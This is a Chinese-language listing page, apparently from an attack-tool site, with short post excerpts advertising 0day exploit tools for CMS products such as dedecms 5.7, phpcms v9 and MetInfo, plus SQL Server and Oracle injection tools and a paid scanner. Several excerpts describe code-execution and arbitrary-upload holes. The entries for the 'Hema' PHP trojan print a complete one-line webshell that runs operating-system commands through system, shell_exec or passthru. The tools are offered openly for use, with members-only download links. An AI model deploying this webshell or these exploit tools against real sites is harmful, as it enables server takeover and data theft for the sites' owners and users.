预览模式: 普通 | 列表


20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 64 | 引用: 0 | 查看次数: 8266


dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 86 | 引用: 0 | 查看次数: 10237


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1347

WebSmart Web应用漏洞扫描器v1.4


   网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装,支持Windows操作系统,
用于对自己的网站进行日常的安全检查。
适用对象:网站规模和数量较小的企业、学校、事业单位等。
价格: 6,000元/年 ,3,000元/月,试用30次无限制。

查看更多...

Tags: 扫描器

分类:WebSmart | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 4209

【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru
版本2功能:软件是一个php脚本木马,将<?php $page = $_REQUEST['page'];

查看更多...

Tags: php

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2286

河马SQLServer注入工具v1.2



如果存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,
或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,这个工具有一个亮
点是支持cookie
和身份验证。

查看更多...

Tags: sql

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2857

会员上传文件漏洞,可以上传任意后缀

user/swfupload.asp文件漏洞

If UpFileObj.Form("NoReName")="1" Then '不更名

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2514

漏洞文件: img.php
<?php

# MetInfo Enterprise Content Management System

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 10 | 引用: 0 | 查看次数: 2721


歪酷cms2.0版本Search.html存在远程代码执行漏洞,成功利用该漏洞
的攻击者,
能以php进程用户权限执行任意代码。
下载只允许会员下载 该文件只允许会员下载! 登录 | 注册

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2185

dedeCms 5.7recommend.php 注入漏洞利用工具


漏洞文件: uploadsafe.inc.php

首先对比下补丁,发现修改了几个文件,其中的\include\uploadsafe.inc.php修改了代码

补丁前代码为:

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3113

漏洞分析

在中 v9\phpcms\modules\member\index.php381行处

public function account_manage_avatar() {

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2249

【河马】Oracle注入工具v1.1


Support oracle db Union
Support oracle db Http Reverse
Support oracle db Error Mode 1(utl_inaddr)
Support oracle db Error Mode 2
Support oracle db Error Mode 3

查看更多...

Tags: sql

分类:SQL注入工具 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 2978


只允许会员下载 该文件只允许会员下载! 登录 | 注册
更多工具在: isafe.cc" target="_blank">isafe.cc/">http://www.isafe.cc" target="_blank">isafe.cc/
web墙:      isafe.cc" target="_blank">isafe.cc/">http://waf.isafe.cc" target="_blank">isafe.cc/
漏洞利用前提: 有phpcms后台权限

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4008
无标题文档